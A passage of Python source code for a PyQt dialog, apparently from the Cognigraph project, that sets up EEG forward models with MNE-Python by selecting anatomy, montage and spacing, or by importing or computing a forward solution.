Download?\",\n QMessageBox.Yes | QMessageBox.No,\n )\n if ans == QMessageBox.Yes:\n download_anatomy_and_forwards()\n files = os.listdir(path)\n return sorted(\n [\n f\n for f in files\n if op.isdir(op.join(path, f))\n and \"surf\" in os.listdir(op.join(path, f))\n ]\n )\n\n def _on_anat_path_changed(self):\n new_path = self.subjects_dir_widget.path_ledit.text()\n if new_path != self.subjects_dir:\n self.subjects = self._get_fsf_subjects(new_path)\n self.subject_combobox.setItems(sorted(self.subjects))\n self.subjects_dir = new_path\n # If valid freesurfer subjects were found:\n if self.subject_combobox.currentText():\n self.subjects_dir = self.subjects_dir\n self.subject = self.subject_combobox.currentText()\n self.is_valid = True\n else:\n self.is_valid = False\n\n def _on_subject_combo_changed(self):\n self.subject = self.subject_combobox.currentText()\n\n @property\n def is_use_available_anat(self):\n return self._use_avail_anat_radio.isChecked()\n\n\nclass _CustomMontageWidget(QWidget):\n def __init__(self, parent=None):\n QWidget.__init__(self, parent)\n self.checkbox = QCheckBox()\n checkbox_label = QLabel(\"&Use custom montage:\")\n checkbox_label.setBuddy(self.checkbox)\n self.button = QPushButton(\"&Edit\")\n self.button.setDisabled(True)\n self.lineedit = QLineEdit(\"custom montage\")\n\n self.checkbox.stateChanged.connect(self._on_checkbox_toggled)\n self.lineedit.setDisabled(True)\n self.lineedit.setReadOnly(True)\n self.lineedit.setToolTip(self.lineedit.text())\n self.lineedit.textChanged.connect(self._set_lineedit_tooltip)\n\n layout = QGridLayout()\n self.setLayout(layout)\n layout.addWidget(checkbox_label, 0, 0)\n layout.addWidget(self.checkbox, 0, 1)\n layout.addWidget(self.button, 0, 2)\n layout.addWidget(self.lineedit, 1, 0, 1, 3)\n self.hide()\n\n def _set_lineedit_tooltip(self):\n self.lineedit.setToolTip(self.lineedit.text())\n\n def _on_checkbox_toggled(self, state):\n if state:\n self.lineedit.setDisabled(False)\n self.button.setDisabled(False)\n else:\n self.lineedit.setDisabled(True)\n self.button.setDisabled(True)\n\n\nclass _FwdGeomGroupbox(_StateAwareGroupbox):\n \"\"\"\n Groupbox to setup spacing and montage and select forward from disk.\n\n If in choosing from available forwards mode, combobox values in spacing\n and montage correspond to folders in COGNIGRAPH_DATA.\n Availabled forwards are fetched from these folers.\n\n If in computing forward mode, montage combobox values come from mne-python\n get_builtin_montages function while spacing combobox values are\n preset to be from ['oct5', 'ico5', 'oct6', 'ico6'], which are\n octahedron and icosahedron tesselations of a sphere with number\n corresponding to the number of tesselation steps.\n\n \"\"\"\n\n default_montage = \"standard_1005\"\n default_spacing = \"oct6\"\n\n def __init__(\n self,\n default_subj,\n title=\"Select montage and spacing\",\n parent=None,\n data_chnames=None,\n ):\n _StateAwareGroupbox.__init__(self, title=title, parent=parent)\n self._data_chnames = data_chnames\n self._anat_folder = None\n # self.is_valid = True\n # self.setToolTip('I`m here to help')\n\n # -------- setup paths and fetch montages -------- #\n self._get_builtin_montages()\n self._default_forwards_path = op.join(\n COGNIGRAPH_DATA, \"forwards\", default_subj\n )\n self.get_available_forwards(self._default_forwards_path)\n # self._is_montages_combo_connected = False # to spacings combo\n # ------------------------------------------------ #\n\n # -------- setup comboboxes -------- #\n self._montages_combo = 
_ResettableComboBox()\n self._montages_combo.currentTextChanged.connect(\n self._on_montage_combo_changed\n )\n # self._montages_combo.currentIndexChanged.connect(self._check_if_valid)\n montages_combo_label = QLabel(\"Select montage:\")\n montages_combo_label.setBuddy(self._montages_combo)\n montages_combo_layout = QHBoxLayout()\n montages_combo_layout.addWidget(montages_combo_label)\n montages_combo_layout.addWidget(self._montages_combo)\n self._montages_combo_widget = QWidget()\n self._montages_combo_widget.setLayout(montages_combo_layout)\n\n self._spacings_combo = _ResettableComboBox()\n self._spacings_combo.currentTextChanged.connect(\n self._on_spacings_combo_changed\n )\n spacings_label = QLabel(\"Select spacing:\")\n spacings_label.setBuddy(self._spacings_combo)\n spacings_combo_layout = QHBoxLayout()\n spacings_combo_layout.addWidget(spacings_label)\n spacings_combo_layout.addWidget(self._spacings_combo)\n self._spacings_combo_widget = QWidget()\n self._spacings_combo_widget.setLayout(spacings_combo_layout)\n\n self._forwards_combo = _ResettableComboBox()\n forwards_label = QLabel(\"Select forward operator:\")\n forwards_label.setBuddy(self._spacings_combo)\n forwards_combo_layout = QVBoxLayout()\n forwards_combo_layout.addWidget(forwards_label)\n forwards_combo_layout.addWidget(self._forwards_combo)\n self._forwards_combo_widget = QWidget()\n self._forwards_combo_widget.setLayout(forwards_combo_layout)\n # ---------------------------------- #\n\n self._use_default_montage_radio = QRadioButton(\"&Use default\")\n self._import_montage_radio = QRadioButton(\"&Import montage\")\n self._use_default_montage_radio.setChecked(True)\n self._use_default_montage_radio.toggled.connect(\n self._on_import_montage_radio_toggled\n )\n self._import_montage_radio.toggled.connect(\n self._on_import_montage_radio_toggled\n )\n\n self._select_montage_dialog = _FileSelectorWidget(\n dialog_caption=\"Select montage model\",\n path=\"\",\n file_filter=\"*.txt *.elc *.csd *.elp *.htps\"\n \" *.sfp *.loc *.locs *.eloc *.bvef\",\n )\n self._select_montage_dialog.path_ledit.textChanged.connect(\n self._on_montage_path_changed\n )\n # self._select_montage_dialog.path_ledit.textChanged.connect(\n # self._check_if_valid\n # )\n self._select_montage_dialog.setDisabled(True)\n\n self._custom_montage_widget = _CustomMontageWidget()\n self._custom_montage_widget.button.clicked.connect(\n self._on_edit_montage_button_clicked\n )\n self._custom_montage_widget.checkbox.stateChanged.connect(\n self._on_custom_montage_checkbox_toggled\n )\n # self._custom_montage_widget.lineedit.textChanged.connect(\n # self._check_if_valid\n # )\n\n # initialize combos with available forwards\n self.is_use_available = True\n\n # -------- setup layout -------- #\n default_fwd_layout = QVBoxLayout()\n default_fwd_layout.addWidget(self._use_default_montage_radio)\n default_fwd_layout.addWidget(self._montages_combo_widget)\n default_fwd_layout.addWidget(self._import_montage_radio)\n default_fwd_layout.addWidget(self._select_montage_dialog)\n default_fwd_layout.addWidget(self._custom_montage_widget)\n default_fwd_layout.addWidget(self._spacings_combo_widget)\n default_fwd_layout.addWidget(self._forwards_combo_widget)\n\n self.default_fwd_widget = QWidget()\n self.default_fwd_widget.setLayout(default_fwd_layout)\n self.default_fwd_widget.setSizePolicy(\n QSizePolicy.Minimum, QSizePolicy.Fixed\n )\n\n default_fwd_setup_layout = QVBoxLayout()\n default_fwd_setup_layout.addWidget(self.default_fwd_widget)\n\n 
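# hand the assembled layout to Qt; setLayout reparents the child widgets
        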
self.setLayout(default_fwd_setup_layout)\n # ------------------------------ #\n # self._check_if_valid()\n\n def _get_builtin_montages(self):\n # called when choosing forward from available files on disk\n montages_desc_path = op.join(COGNIGRAPH_DATA, \"montages_desc.json\")\n with open(montages_desc_path, \"r\", encoding=\"utf8\") as f:\n description = json.load(f)\n self.montages_desc = description[\"montages\"]\n self.spacings_desc = description[\"spacings\"]\n self.builtin_montage_names = sorted(\n mne.channels.get_builtin_montages()\n )\n\n def get_available_forwards(self, folder):\n \"\"\"Fetch forwards from COGNIGRAPH_DATA folders structure\"\"\"\n self._anat_folder = folder\n p = folder\n if op.isdir(p):\n self._available_montages = sorted(\n [i for i in os.listdir(p) if op.isdir(op.join(p, i))]\n )\n else:\n self._available_montages = []\n self._available_forwards = {}\n for a in self._available_montages:\n spacings = os.listdir(op.join(p, a))\n self._available_forwards[a] = {}\n for s in spacings:\n forwards = [\n f\n for f in os.listdir(op.join(p, a, s))\n if f.endswith(\"fwd.fif\")\n ]\n self._available_forwards[a][s] = forwards\n\n def _set_hints(self):\n \"\"\"Set popup description messages to comboboxes\"\"\"\n block_signals = QSignalBlocker(self._montages_combo) # noqa\n\n for i, key in enumerate(self._montages_combo.getItems()):\n try:\n self._montages_combo.setItemData(\n i, self.montages_desc[key], Qt.ToolTipRole\n )\n except KeyError:\n pass\n\n for i, key in enumerate(self._spacings_combo.getItems()):\n try:\n self._spacings_combo.setItemData(\n i, self.spacings_desc[key], Qt.ToolTipRole\n )\n except KeyError:\n pass\n\n def _set_combos_to_builtin(self):\n \"\"\"Used when we switch to compute forward mode\"\"\"\n block_signals = QSignalBlocker(self._montages_combo) # noqa\n self._montages_combo.setItems(self.builtin_montage_names)\n self.montage = self.default_montage\n self._spacings_combo.setItems(\n [k for k in self.spacings_desc if k != \"imported\"]\n )\n self.spacing = self.default_spacing # uses spacing setter\n self._forwards_combo_widget.hide()\n self._set_hints()\n\n self._use_default_montage_radio.show()\n self._import_montage_radio.show()\n self._select_montage_dialog.show()\n self._custom_montage_widget.show()\n\n def _set_combos_to_available(self):\n \"\"\"Default option: load forward from cognigraph folders structure\"\"\"\n\n self._set_montages_combo_to_available()\n\n self._forwards_combo_widget.show()\n\n self._set_hints()\n self._use_default_montage_radio.hide()\n self._import_montage_radio.hide()\n self._select_montage_dialog.hide()\n self._custom_montage_widget.hide()\n\n def _set_montages_combo_to_available(self):\n block_signals = QSignalBlocker(self._montages_combo) # noqa\n self._montages_combo.setItems(self._available_montages)\n self.montage = self.default_montage\n self._set_spacings_combo_to_available()\n\n def _set_spacings_combo_to_available(self):\n montage = self.montage\n if self._available_forwards:\n self._spacings_combo.setItems(\n self._available_forwards[montage].keys()\n )\n self.spacing = self.default_spacing\n self._set_forwards_combo_to_available()\n\n def _set_forwards_combo_to_available(self):\n if self._available_forwards:\n self._forwards_combo.setItems(\n self._available_forwards[self.montage][self.spacing]\n )\n\n def _on_montage_combo_changed(self):\n \"\"\"\n If using available forwards, fetch all available spacings and forwards\n for selected montage; set self.montage\n\n \"\"\"\n if self.is_use_available:\n 
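# montage changed: refresh the dependent spacing and forward combos\n            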
self._set_spacings_combo_to_available()\n\n        # if self._forwards_combo.currentText():\n        #     self.is_valid = True\n        # else:\n        #     self.is_valid = False\n        if self._custom_montage_widget.checkbox.isChecked():\n            self._custom_montage_widget.lineedit.setText(\n                self._montages_combo.currentText()\n            )\n        QTimer.singleShot(0, self._check_if_valid)\n\n    def _on_spacings_combo_changed(self):\n        if self.is_use_available:\n            self._set_forwards_combo_to_available()\n        QTimer.singleShot(0, self._check_if_valid)\n\n    def _on_import_montage_radio_toggled(self):\n        if self._use_default_montage_radio.isChecked():\n            self._select_montage_dialog.setDisabled(True)\n            self._montages_combo_widget.setDisabled(False)\n        else: # 'compute forward' case\n            self._select_montage_dialog.setDisabled(False)\n            self._montages_combo_widget.setDisabled(True)\n            self._select_montage_dialog.browse_button.setFocus()\n        QTimer.singleShot(0, self._check_if_valid)\n\n    def _on_montage_path_changed(self):\n        # if self._select_montage_dialog.path_ledit.text():\n        #     self.is_valid = True\n        if self._custom_montage_widget.checkbox.isChecked():\n            self._custom_montage_widget.lineedit.setText(\n                self._select_montage_dialog.path_ledit.text()\n            )\n        QTimer.singleShot(0, self._check_if_valid)\n\n    def _check_if_valid(self):\n        is_montage_valid = self._check_montage()\n        if self.is_use_available and not self.fwd_name:\n            is_forward_ok = False\n        else:\n            is_forward_ok = True\n        self.is_valid = is_montage_valid and is_forward_ok\n        if not is_montage_valid:\n            self.parent()._dialog_buttons.button(\n                QDialogButtonBox.Ok\n            ).setToolTip(\n                \"Data and forward channel names don't match.\"\n                \" Please edit montage or select another forward.\"\n            )\n        elif not is_forward_ok:\n            self.parent()._dialog_buttons.button(\n                QDialogButtonBox.Ok\n            ).setToolTip(\"Forward model is missing.\")\n        else:\n            self.parent()._dialog_buttons.button(\n                QDialogButtonBox.Ok\n            ).setToolTip(\"\")\n\n    def _check_montage(self):\n        montage_name = self.montage\n        if montage_name != \"imported\":\n            try:\n                montage = mne.channels.read_montage(montage_name)\n            except ValueError:\n                montage_path = op.join(MONTAGES_DIR, montage_name) + \".elc\"\n                try:\n                    montage = mne.channels.read_montage(montage_path)\n                except Exception:\n                    return False\n            ch_names_forward = montage.ch_names\n        else:\n            fwd_path = op.join(\n                self._anat_folder, self.montage, self.spacing, self.fwd_name\n            )\n            fwd = mne.read_forward_solution(fwd_path)\n            ch_names_forward = fwd[\"info\"][\"ch_names\"]\n\n        data_chnames_upper = [d.upper() for d in self._data_chnames]\n        ch_names_intersect = [\n            n for n in ch_names_forward if n.upper() in data_chnames_upper\n        ]\n        if len(ch_names_intersect) > 0.2 * len(self._data_chnames):\n            return True\n        else:\n            return False\n\n    @property\n    def montage(self):\n        montage = None\n        if not self._custom_montage_widget.checkbox.isChecked():\n            if self._use_default_montage_radio.isChecked():\n                montage = self._montages_combo.currentText()\n            else:\n                montage = self._select_montage_dialog.path_ledit.text()\n        else:\n            montage = self._custom_montage_widget.lineedit.text()\n        return montage\n\n    @montage.setter\n    def montage(self, value):\n        if not self._custom_montage_widget.checkbox.isChecked():\n            if self._use_default_montage_radio.isChecked():\n                self._montages_combo.setCurrentText(value)\n            else:\n                self._select_montage_dialog.path_ledit.setText(value)\n        else:\n            self._custom_montage_widget.lineedit.setText(value)\n\n    @property\n    def spacing(self):\n        return self._spacings_combo.currentText()\n\n    @spacing.setter\n    def spacing(self, value):\n        
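# delegate to the combobox; its change signal refreshes dependent widgets\n        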
self._spacings_combo.setCurrentText(value)\n\n    @property\n    def fwd_name(self):\n        return self._forwards_combo.currentText()\n\n    @fwd_name.setter\n    def fwd_name(self, value):\n        self._forwards_combo.setCurrentText(value)\n\n    @property\n    def is_use_available(self):\n        return self._is_use_available\n\n    @is_use_available.setter\n    def is_use_available(self, value):\n        self._is_use_available = value\n        self._use_default_montage_radio.setChecked(True)\n        if value:\n            self._set_combos_to_available()\n        else:\n            # forward computation case\n            self._set_combos_to_builtin()\n\n    def _on_edit_montage_button_clicked(self):\n        m = mne.channels.read_montage(self.montage)\n        montage_editor = MontageEditor(self._data_chnames, m, self)\n        montage_editor.exec()\n        if montage_editor.result():\n            self.montage = montage_editor.montage_path\n            QTimer.singleShot(0, self._check_if_valid)\n\n    def _on_custom_montage_checkbox_toggled(self, state):\n        if state:\n            if self._use_default_montage_radio.isChecked():\n                montage = self._montages_combo.currentText()\n            else:\n                montage = self._select_montage_dialog.path_ledit.text()\n            self._custom_montage_widget.lineedit.setText(montage)\n\n\nclass _ImportFwdGroupbox(_StateAwareGroupbox):\n    \"\"\"Groupbox for loading a forward model from file\"\"\"\n\n    def __init__(\n        self, title=\"Import forward model\", parent=None, data_chnames=None\n    ):\n        _StateAwareGroupbox.__init__(self, title=title, parent=parent)\n        self._data_chnames = data_chnames\n        self.is_valid = False\n        self.is_active = False\n        self.select_fwd_dialog = _FileSelectorWidget(\n            dialog_caption=\"Select forward model\",\n            path=\"\",\n            file_filter=\"*fwd.fif\",\n        )\n\n        self.select_fwd_dialog.path_ledit.textChanged.connect(\n            self._on_path_changed\n        )\n\n        import_fwd_layout = QVBoxLayout()\n        import_fwd_layout.addWidget(self.select_fwd_dialog)\n\n        self.setLayout(import_fwd_layout)\n        self.setVisible(True)\n\n    def _on_path_changed(self):\n        fwd_path = self.select_fwd_dialog.path_ledit.text()\n        fwd = mne.read_forward_solution(fwd_path)\n        ch_names_forward = fwd[\"info\"][\"ch_names\"]\n\n        data_chnames_upper = [d.upper() for d in self._data_chnames]\n        ch_names_intersect = [\n            n for n in ch_names_forward if n.upper() in data_chnames_upper\n        ]\n        if len(ch_names_intersect) > 0.2 * len(self._data_chnames):\n            self.parent()._dialog_buttons.button(\n                QDialogButtonBox.Ok\n            ).setToolTip(\"\")\n            self.is_valid = True\n        else:\n            self.parent()._dialog_buttons.button(\n                QDialogButtonBox.Ok\n            ).setToolTip(\n                \"Data and forward channel names don't match.\"\n                \" Please select another forward.\"\n            )\n            self.is_valid = False\n\n\nclass _ComputeFwdGroupbox(_StateAwareGroupbox):\n    \"\"\"Groupbox with parameters for forward computation\"\"\"\n\n    def __init__(self, title=\"Forward computation parameters\", parent=None):\n        _StateAwareGroupbox.__init__(self, title=title, parent=parent)\n\n        self.default_coreg_file = None\n        self._is_valid = True\n        self.is_active = False\n        # -------- create widgets -------- #\n        self._no_coreg_radio = QRadioButton(\"None\")\n        self._select_coreg_radio = QRadioButton(\"Select\")\n        self._select_coreg_widget = _FileSelectorWidget(\n            dialog_caption=\"Select coregistration file\",\n            file_filter=\"*trans.fif\",\n        )\n\n        cond_defaults = self._get_default_mne_conductivities()\n        self._brain_conductivity_spinbox = QDoubleSpinBox(\n            singleStep=0.001, decimals=3, value=cond_defaults[0]\n        )\n\n        self._skull_conductivity_spinbox = QDoubleSpinBox(\n            singleStep=0.001, decimals=3, value=cond_defaults[1]\n        )\n\n        self._scalp_conductivity_spinbox = QDoubleSpinBox(\n            
singleStep=0.001, decimals=3, value=cond_defaults[2]\n        )\n\n        conductivity_label = QLabel(\"Conductivities:\")\n        conductivity_label.setBuddy(self._brain_conductivity_spinbox)\n        # -------------------------------- #\n\n        # -------- connect and setup widgets -------- #\n        self._no_coreg_radio.setChecked(True)\n        self._no_coreg_radio.toggled.connect(self._on_toggled)\n        self._select_coreg_radio.toggled.connect(self._on_toggled)\n        self._select_coreg_widget.setDisabled(True)\n\n        self._select_coreg_widget.path_ledit.textChanged.connect(\n            self._on_path_changed\n        )\n        # ------------------------------------------------- #\n\n        # Coregistration sub-groupbox\n        coreg_layout = QVBoxLayout()\n        coreg_layout.addWidget(self._no_coreg_radio)\n        coreg_layout.addWidget(self._select_coreg_radio)\n        coreg_layout.addWidget(self._select_coreg_widget)\n\n        coreg_gpbox = QGroupBox(\"Coregistration file\")\n        coreg_gpbox.setSizePolicy(QSizePolicy.Minimum, QSizePolicy.Fixed)\n        coreg_gpbox.setLayout(coreg_layout)\n        ##\n\n        conductivity_layout = QHBoxLayout()\n        conductivity_layout.addWidget(conductivity_label)\n        conductivity_layout.addWidget(self._brain_conductivity_spinbox)\n        conductivity_layout.addWidget(self._skull_conductivity_spinbox)\n        conductivity_layout.addWidget(self._scalp_conductivity_spinbox)\n\n        compute_fwd_layout = QVBoxLayout()\n        compute_fwd_layout.addWidget(coreg_gpbox)\n        compute_fwd_layout.addLayout(conductivity_layout)\n        self.setLayout(compute_fwd_layout)\n\n    def _get_default_mne_conductivities(self):\n        sign = inspect.signature(mne.make_bem_model)\n        return sign.parameters[\"conductivity\"].default\n\n    def _on_toggled(self):\n        if self._no_coreg_radio.isChecked():\n            self._select_coreg_widget.setDisabled(True)\n            self.is_valid = True\n        else:\n            self._select_coreg_widget.setDisabled(False)\n            if self._select_coreg_widget.path_ledit.text():\n                self.is_valid = True\n            else:\n                self.is_valid = False\n            self._select_coreg_widget.browse_button.setFocus()\n\n    def _on_path_changed(self):\n        if self._select_coreg_widget.path_ledit.text():\n            self.is_valid = True\n\n    @property\n    def conductivity(self):\n        conductivity = (\n            self._brain_conductivity_spinbox.value(),\n            self._skull_conductivity_spinbox.value(),\n            self._scalp_conductivity_spinbox.value(),\n        )\n        return conductivity\n\n    @property\n    def trans_file(self):\n        trans_file = self._select_coreg_widget.path_ledit.text()\n        if trans_file:\n            return trans_file\n        else:\n            return None\n\n\nclass BadInputFile(Exception):\n    pass\n\n\nclass ComputeFwdInThread(ThreadToBeWaitedFor):\n    \"\"\"Compute forward model in a parallel thread\"\"\"\n\n    def __init__(\n        self,\n        montage,\n        subjects_dir,\n        subject,\n        spacing,\n        conductivity,\n        trans_file,\n        dest_dir,\n        n_jobs=8,\n        verbose=\"ERROR\",\n        parent=None,\n    ):\n        ThreadToBeWaitedFor.__init__(self, parent=parent)\n        self.progress_text = \"Computing forward model... 
Please be patient.\"\n self.error_text = \"Forward model computation failed.\"\n self.montage = montage\n self.subjects_dir = subjects_dir\n self.subject = subject\n self.spacing = spacing\n self.conductivity = conductivity\n self.trans_file = trans_file\n self.dest_dir = dest_dir\n self.n_jobs = n_jobs\n self.verbose = verbose\n self.fwd_savename = None\n self.is_show_progress = True\n\n montage_kind = op.splitext(op.basename(montage))[0]\n fwd_name = \"-\".join([subject, \"eeg\", spacing, montage_kind, \"fwd.fif\"])\n self.fwd_savename = op.join(dest_dir, montage_kind, spacing, fwd_name)\n\n self._logger = logging.getLogger(type(self).__name__)\n\n def no_blocking_execution(self):\n if op.isfile(self.fwd_savename):\n ans = QMessageBox.question(\n self.parent(),\n \"Destination file exists\",\n 'Forward model file \"%s\" already exists.'\n \" Recomtute?\" % self.fwd_savename,\n QMessageBox.Yes | QMessageBox.No,\n )\n if ans == QMessageBox.Yes:\n return ThreadToBeWaitedFor.no_blocking_execution(self)\n else:\n return True # success since forward model is already there\n else:\n return ThreadToBeWaitedFor.no_blocking_execution(self)\n\n def _run(self):\n \"\"\"Compute 3-layer BEM based forward model from montage and anatomy\"\"\"\n montage = self.montage\n subjects_dir = self.subjects_dir\n subject = self.subject\n spacing = self.spacing\n conductivity = self.conductivity\n trans_file = self.trans_file\n dest_dir = self.dest_dir\n n_jobs = self.n_jobs\n verbose = self.verbose\n self._logger.debug(\"Computing forward with the following parameters.\")\n self._logger.debug(\"montage: %s\", montage)\n self._logger.debug(\"SUBJECT: %s\", subject)\n self._logger.debug(\"SUBJECTS_DIR: %s\", subjects_dir)\n self._logger.debug(\"spacing: %s\", spacing)\n self._logger.debug(\"trans_file: %s\", trans_file)\n self._logger.debug(\"conductivity: %s\", conductivity)\n self._logger.debug(\"dest_dir: %s\", dest_dir)\n\n try:\n montage = mne.channels.read_montage(kind=montage)\n except Exception:\n raise BadInputFile(\"Bad montage file: %s\" % montage)\n\n os.makedirs(op.dirname(self.fwd_savename), exist_ok=True)\n\n fiducials = [\"LPA\", \"RPA\", \"Nz\", \"FidT9\", \"FidT10\", \"FidNz\"]\n self._logger.info(\"Setting up the source space ...\")\n src = mne.setup_source_space(\n subject,\n spacing=spacing,\n subjects_dir=subjects_dir,\n add_dist=False,\n verbose=verbose,\n )\n self.progress_updated.emit(25)\n\n # raise Exception('Some catastrophic shit happened')\n self._logger.info(\"Creating bem model (be patient) ...\")\n model = mne.make_bem_model(\n subject=subject,\n ico=4,\n conductivity=conductivity,\n subjects_dir=subjects_dir,\n verbose=verbose,\n )\n self.progress_updated.emit(50)\n bem = mne.make_bem_solution(model, verbose=verbose)\n self.progress_updated.emit(75)\n if not trans_file:\n trans_file = None\n n_jobs = n_jobs\n self._logger.info(\"Computing forward solution (be patient) ...\")\n ch_names = montage.ch_names\n ch_names = [c for c in ch_names if c not in fiducials]\n info = mne.create_info(ch_names, sfreq=1, ch_types=\"eeg\")\n raw = mne.io.RawArray(\n np.ones([len(info[\"ch_names\"]), 1]), info, verbose=verbose\n )\n raw.set_montage(montage)\n\n ch_names = montage.ch_names\n ch_names = [c for c in ch_names if c not in fiducials]\n fwd = mne.make_forward_solution(\n raw.info,\n trans=trans_file,\n src=src,\n bem=bem,\n meg=False,\n eeg=True,\n mindist=5.0,\n n_jobs=n_jobs,\n verbose=verbose,\n )\n self.progress_updated.emit(100)\n\n mne.write_forward_solution(\n self.fwd_savename, fwd, 
overwrite=True, verbose=verbose\n )\n\n\nclass FwdSetupDialog(QDialog):\n \"\"\"\n Dialog window for anatomy and forward model setup\n\n Launch dialog window which sets up fwd_path, subjects_dir and subject\n attributes\n\n Parameters\n ----------\n parent: QObject, optional, default: None\n Parent PyQt widget\n\n Attributes\n ----------\n fwd_path: str\n Path to forward model file\n subjects_dir: str\n Path to freesurfer SUBJECTS_DIR\n subject: str\n subject name corresponding to a subfolder of SUBJECTS_DIR\n\n \"\"\"\n\n def __init__(\n self, parent=None, subjects_dir=None, subject=None, data_chnames=None\n ):\n QDialog.__init__(self, parent)\n\n self._is_ok_to_close = True\n # -------- create widgets -------- #\n self._anat_gpbox = _AnatGroupbox(subjects_dir=None, subject=None)\n self._forward_gpbox = _FwdOptionsRadioButtons()\n self._fwd_geom_gpbox = _FwdGeomGroupbox(\n self._anat_gpbox.default_subj, data_chnames=data_chnames\n )\n self._compute_fwd_gpbox = _ComputeFwdGroupbox()\n self._import_fwd_gpbox = _ImportFwdGroupbox(data_chnames=data_chnames)\n # -------------------------------- #\n\n # -------- setup widgets and connects slots -------- #\n self._compute_fwd_gpbox.is_active = False\n self._import_fwd_gpbox.is_active = False\n\n self._anat_gpbox.import_anat_radio.toggled.connect(\n self._on_anat_radio_toggled\n )\n self._anat_gpbox.subject_combobox.currentTextChanged.connect(\n self._reset_forward_groupbox\n )\n\n self._forward_gpbox.use_default_fwd_radio.toggled.connect(\n self._on_fwd_option_toggled\n )\n\n self._forward_gpbox.import_fwd_radio.toggled.connect(\n self._on_fwd_option_toggled\n )\n self._forward_gpbox.import_fwd_radio.toggled.connect(\n self._import_fwd_gpbox.select_fwd_dialog.browse_button.setFocus\n )\n\n self._forward_gpbox.compute_fwd_radio.toggled.connect(\n self._on_fwd_option_toggled\n )\n\n self._anat_gpbox.state_changed.connect(self._states_changed)\n self._compute_fwd_gpbox.state_changed.connect(self._states_changed)\n self._import_fwd_gpbox.state_changed.connect(self._states_changed)\n self._fwd_geom_gpbox.state_changed.connect(self._states_changed)\n # -------------------------------------------------- #\n\n # ------------- layout ------------- #\n main_layout = QHBoxLayout()\n main_layout.addWidget(self._anat_gpbox)\n main_layout.addWidget(self._forward_gpbox)\n main_layout.addWidget(self._fwd_geom_gpbox)\n main_layout.addWidget(self._import_fwd_gpbox)\n main_layout.addWidget(self._compute_fwd_gpbox)\n\n outer_layout = QVBoxLayout()\n self._dialog_buttons = QDialogButtonBox(\n QDialogButtonBox.Ok | QDialogButtonBox.Cancel\n )\n self._dialog_buttons.accepted.connect(self._on_ok)\n self._dialog_buttons.rejected.connect(self.reject)\n outer_layout.addLayout(main_layout)\n outer_layout.addWidget(self._dialog_buttons)\n self.setLayout(outer_layout)\n # ---------------------------------- #\n\n self.subjects_dir = None\n self.subject = None\n self.fwd_path = None\n\n self.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n\n self._logger = logging.getLogger(type(self).__name__)\n\n def _on_anat_radio_toggled(self):\n if self._anat_gpbox.import_anat_radio.isChecked():\n if self._forward_gpbox.use_default_fwd_radio.isChecked():\n self._forward_gpbox.compute_fwd_radio.setChecked(True)\n self._forward_gpbox.use_default_fwd_radio.setDisabled(True)\n else:\n self._forward_gpbox.use_default_fwd_radio.setDisabled(False)\n\n def _on_fwd_option_toggled(self):\n if self._forward_gpbox.use_default_fwd_radio.isChecked():\n self._import_fwd_gpbox.is_active = False\n 
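# default-forward mode: only the geometry groupbox stays active\n            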
self._compute_fwd_gpbox.is_active = False\n self._fwd_geom_gpbox.is_active = True\n self._fwd_geom_gpbox.get_available_forwards(\n op.join(COGNIGRAPH_DATA, \"forwards\", self._anat_gpbox.subject)\n )\n self._fwd_geom_gpbox.is_use_available = True\n self._fwd_geom_gpbox._custom_montage_widget.checkbox.setCheckState(\n False\n )\n elif self._forward_gpbox.import_fwd_radio.isChecked():\n self._import_fwd_gpbox.is_active = True\n self._compute_fwd_gpbox.is_active = False\n self._fwd_geom_gpbox.is_active = False\n self._fwd_geom_gpbox._custom_montage_widget.checkbox.setCheckState(\n False\n )\n elif self._forward_gpbox.compute_fwd_radio.isChecked():\n self._import_fwd_gpbox.is_active = False\n self._compute_fwd_gpbox.is_active = True\n self._fwd_geom_gpbox.is_active = True\n self._fwd_geom_gpbox.is_use_available = False\n QTimer.singleShot(0, self._fixSize)\n\n def _fixSize(self):\n \"\"\"Fix widget size after some of subwidgets were hidden\"\"\"\n size = self.sizeHint()\n self.resize(size)\n\n def _states_changed(self):\n anat_is_good = self._anat_gpbox.is_good\n comp_is_good = self._compute_fwd_gpbox.is_good\n imp_is_good = self._import_fwd_gpbox.is_good\n geom_is_good = self._fwd_geom_gpbox.is_good\n if comp_is_good and imp_is_good and geom_is_good and anat_is_good:\n self._dialog_buttons.button(QDialogButtonBox.Ok).setDisabled(False)\n else:\n self._dialog_buttons.button(QDialogButtonBox.Ok).setDisabled(True)\n\n def _on_ok(self):\n \"\"\"Called when OK button is clicked\"\"\"\n self.is_ok_to_close = True\n self.subjects_dir = self._anat_gpbox.subjects_dir\n self._logger.debug('Subjects dir is set to \"%s\".' % self.subjects_dir)\n self.subject = self._anat_gpbox.subject\n self._logger.debug('Subject is set to \"%s\"' % self.subject)\n if self._anat_gpbox.import_anat_radio.isChecked():\n self._copy_anat_to_folders_struct(self.subjects_dir, self.subject)\n self._cur_anat_fwds_path = op.join(\n COGNIGRAPH_DATA, \"forwards\", self.subject\n )\n if self._forward_gpbox.use_default_fwd_radio.isChecked():\n montage = self._fwd_geom_gpbox.montage\n spacing = self._fwd_geom_gpbox.spacing\n fwd_name = self._fwd_geom_gpbox.fwd_name\n self.fwd_path = op.join(\n self._cur_anat_fwds_path, montage, spacing, fwd_name\n )\n\n elif self._forward_gpbox.import_fwd_radio.isChecked():\n path = self._import_fwd_gpbox.select_fwd_dialog.path_ledit.text()\n if op.isfile(path):\n try:\n self.fwd_path = self._copy_fwd_to_folders_struct(path)\n except Exception as e:\n msg = QMessageBox(self)\n msg.setIcon(QMessageBox.Warning)\n msg.setText(\n \"Failed to copy %s inside\"\n \" cognigraph folders structure\" % path\n )\n msg.setDetailedText(str(e))\n msg.show()\n else:\n msg = QMessageBox(self)\n msg.setIcon(QMessageBox.Warning)\n msg.setText(\"%s is not a file\" % path)\n\n elif self._forward_gpbox.compute_fwd_radio.isChecked():\n # -------------------- gather parameters -------------------- #\n conductivity = self._compute_fwd_gpbox.conductivity\n montage = self._fwd_geom_gpbox.montage\n spacing = self._fwd_geom_gpbox.spacing\n trans_file = self._compute_fwd_gpbox.trans_file\n dest_dir = self._cur_anat_fwds_path\n # ----------------------------------------------------------- #\n\n thread_run = ComputeFwdInThread(\n montage,\n self.subjects_dir,\n self.subject,\n spacing,\n conductivity,\n trans_file,\n dest_dir,\n n_jobs=1,\n verbose=\"ERROR\",\n parent=self,\n )\n self._is_ok_to_close = thread_run.no_blocking_execution()\n if self._is_ok_to_close:\n self.fwd_path = thread_run.fwd_savename\n\n if 
